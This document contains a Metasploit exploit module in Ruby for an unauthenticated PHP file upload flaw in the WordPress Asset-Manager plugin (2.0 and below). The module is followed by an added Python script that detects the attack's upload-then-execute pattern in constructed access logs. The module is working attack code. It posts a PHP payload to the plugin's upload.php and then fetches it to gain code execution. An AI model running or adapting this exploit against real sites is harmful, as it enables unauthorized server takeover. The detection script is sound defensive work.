This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body expected by the plugin's upload.php
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # upload.php echoes the stored filename on success
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The uploaded file lands in the plugin's web-accessible temp directory
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'    => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method' => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
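As an added defender-side example (not part of the forum post or of the Metasploit module above), this Python script scans Apache-style access-log lines for the two-step request pattern the module generates: a successful unauthenticated POST to the plugin's upload.php followed by a GET for a .php file under wp-content/uploads/assets/temp/ from the same client. The log lines and client addresses are constructed for the example.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2012:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2012:10:01:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 42 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2012:10:01:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzPd.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.9 - - [26/May/2012:10:02:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/report.pdf HTTP/1.1" 200 8810 "-" "Mozilla/5.0"
198.51.100.9 - - [26/May/2012:10:02:30 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 403 12 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_PATH = "/wp-content/plugins/asset-manager/upload.php"
# A PHP file requested from the plugin's temp directory (where upload.php stores files)
TEMP_PHP_RE = re.compile(r"/wp-content/uploads/assets/temp/([^/?]+\.php\d?)$", re.IGNORECASE)

def detect(log_text):
    """Return alerts for Asset-Manager upload.php abuse.

    'upload' alerts: a successful (2xx) POST to upload.php, which needs no authentication.
    'upload_then_exec' alerts: the same client then fetches a .php file from the temp
    directory, the upload-then-execute sequence the exploit module performs.
    """
    alerts = []
    uploaded_by = defaultdict(list)   # client ip -> timestamps of successful uploads
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m["ip"], m["method"], m["path"], int(m["status"])
        if method == "POST" and path.endswith(UPLOAD_PATH) and 200 <= status < 300:
            uploaded_by[ip].append(m["ts"])
            alerts.append({"type": "upload", "ip": ip, "ts": m["ts"], "status": status})
        php = TEMP_PHP_RE.search(path)
        if method == "GET" and php and ip in uploaded_by:
            alerts.append({"type": "upload_then_exec", "ip": ip, "ts": m["ts"],
                           "file": php.group(1), "status": status})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The 403 on the second client's POST is what a server that denies unauthenticated access to upload.php (or has the plugin removed) should return, so it raises no alert.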